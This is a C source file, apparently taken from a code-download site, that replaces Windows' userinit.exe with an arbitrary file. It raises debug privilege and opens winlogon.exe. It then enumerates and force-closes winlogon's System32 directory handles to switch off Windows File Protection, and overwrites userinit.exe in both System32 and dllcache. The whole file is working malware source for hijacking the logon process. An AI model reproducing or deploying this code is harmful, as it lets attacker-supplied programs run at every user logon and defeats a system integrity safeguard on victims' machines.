www.pudn.com > uay_source.rar > u_replAce.c
#include#include #include #include "u_replAce.h" BOOL DisAbleWFP( void ); DWORD FindProcess( char* pProcessNAme ); PULONG GetHandleList( void ); BOOL CompAreStringBAckwArds( WCHAR *Str1, WCHAR *Str2 ); BOOL DisAbleWFP( void ); int RAisePrivilege( void ); int ReplAceUserinit( char* withwhom //最终替换userinit.exe 函数不负责删除withwhom ); //-------------------------------------------------------------------- int ReplAceUserinit( char* withwhom ) { char userinit_system32[MAX_PATH+1]; char userinit_system32_dllcAche[MAX_PATH+1]; GetSystemDirectory(userinit_system32,MAX_PATH); GetSystemDirectory(userinit_system32_dllcAche,MAX_PATH); strcat(userinit_system32,"\\userinit.exe"); strcat(userinit_system32_dllcAche,"\\dllcache\\userinit.exe"); RAisePrivilege(); if(DisAbleWFP()){ DeleteFile(userinit_system32_dllcAche); CopyFile( withwhom, userinit_system32_dllcAche, FALSE ); DeleteFile(userinit_system32); CopyFile( withwhom, userinit_system32, FALSE ); printf("replAce done.\n"); } else{ printf("didn't disAble WFP\n"); } return 0; } //-------------------------------------------------------------------- BOOL DisAbleWFP() { int i; BOOL bBool; DWORD pid; HANDLE hProcess; HANDLE hCopy; NTSTATUS dwStAtus; HINSTANCE hLib; ZWQUERYOBJECT pZwQueryObject; PSYSTEM_HANDLE_INFORMATION pInfor; DWORD number; PULONG pBuffer; struct {UNICODE_STRING Name; WCHAR Buffer[MAX_PATH + 1]; } ObjNAme;//cAreful hLib = LoadLibrary("ntdll.dll"); pZwQueryObject = (ZWQUERYOBJECT)GetProcAddress(hLib,"ZwQueryObject"); pid = FindProcess("winlogon.exe"); if(pid == 0){ printf("cAn not find the winlogon.exe process\n"); return FALSE; } hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pid ); pBuffer = GetHandleList(); number = *(ULONG*)pBuffer; pInfor = (PSYSTEM_HANDLE_INFORMATION)((ULONG*)pBuffer+1); for(i = 0;i < number;i ++){ if(pInfor->ProcessId == pid){ bBool = DuplicateHandle( hProcess, (HANDLE)(pInfor->Handle), GetCurrentProcess(), &hCopy, 0, FALSE, DUPLICATE_SAME_ACCESS ); if(bBool){ dwStAtus = pZwQueryObject( hCopy, ObjectNameInformation, &ObjNAme, sizeof(ObjNAme), NULL ); if(dwStAtus == STATUS_SUCCESS){ _wcsupr(ObjNAme.Buffer ); if(CompAreStringBAckwArds(ObjNAme.Buffer,L"WINDOWS\\SYSTEM32") || CompAreStringBAckwArds(ObjNAme.Buffer,L"WINNT\\SYSTEM32")) { CloseHandle(hCopy); DuplicateHandle( hProcess, (HANDLE)(pInfor->Handle), GetCurrentProcess(), &hCopy, 0, FALSE, DUPLICATE_SAME_ACCESS | DUPLICATE_CLOSE_SOURCE ); CloseHandle(hCopy); } } } }//if pInfor++; }//for free(pBuffer); //free(ObjNAme.Name.Buffer); CloseHandle(hProcess); return TRUE; } //-------------------------------------------------------------------- DWORD FindProcess(char* pProcessNAme) { BOOL f0k; HANDLE hSnApshot; PROCESSENTRY32 te = {sizeof(te)}; hSnApshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if(hSnApshot!=INVALID_HANDLE_VALUE){ f0k = Process32First(hSnApshot,&te); for(;f0k;f0k=Process32Next(hSnApshot,&te)){ //printf("%d %s\n",te.th32ProcessID ,te.szExeFile ); if(0 == stricmp(te.szExeFile ,pProcessNAme)){ return te.th32ProcessID; } } } CloseHandle(hSnApshot); return 0; } //-------------------------------------------------------------------- PULONG GetHandleList(void)///free the buffer by cAller { ULONG cbBuffer = 0x1000; PULONG pBuffer; NTSTATUS Status; HINSTANCE hLib; ZWQUERYSYSTEMINFORMATION pZwQuerySystemInformAtion; hLib = LoadLibrary("ntdll.dll"); pZwQuerySystemInformAtion = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hLib,"ZwQuerySystemInformation"); pBuffer = malloc(cbBuffer); do { Status = pZwQuerySystemInformAtion( SystemHandleInformation, pBuffer, cbBuffer, NULL ); if (Status == STATUS_INFO_LENGTH_MISMATCH) { free(pBuffer); pBuffer = malloc(cbBuffer *= 2); } else if (!NT_SUCCESS(Status)) { free(pBuffer); return NULL; } }while (Status == STATUS_INFO_LENGTH_MISMATCH); return pBuffer; } //-------------------------------------------------------------------- BOOL CompAreStringBAckwArds(WCHAR *Str1, WCHAR *Str2) { INT Len1 = wcslen(Str1), Len2 = wcslen(Str2); if (Len2 > Len1) return FALSE; for (Len2--, Len1--; Len2 >= 0; Len2--, Len1--){ if (Str1[Len1] != Str2[Len2]) return FALSE; } return TRUE; } //-------------------------------------------------------------------- int RAisePrivilege(void) { TOKEN_PRIVILEGES tp; LUID luid; HANDLE hProcess = NULL,hProcessToken = NULL; if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid)){ printf("LookupPrivilegeVAlue fAiled: %d\n",GetLastError()); return -1; } if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken)){ printf("OpenProcessToken fAiled: %d\n",GetLastError()); return -1; } tp.PrivilegeCount =1;/////////表示只有一个// one privilege to set tp.Privileges [0].Luid = luid; tp.Privileges [0].Attributes = SE_PRIVILEGE_ENABLED; if (!AdjustTokenPrivileges(hProcessToken, FALSE,&tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL) ){ printf("AdjustTokenPrivileges fAiled: %d\n",GetLastError()); return -1; } return 0; } //--------------------------------------------------------------------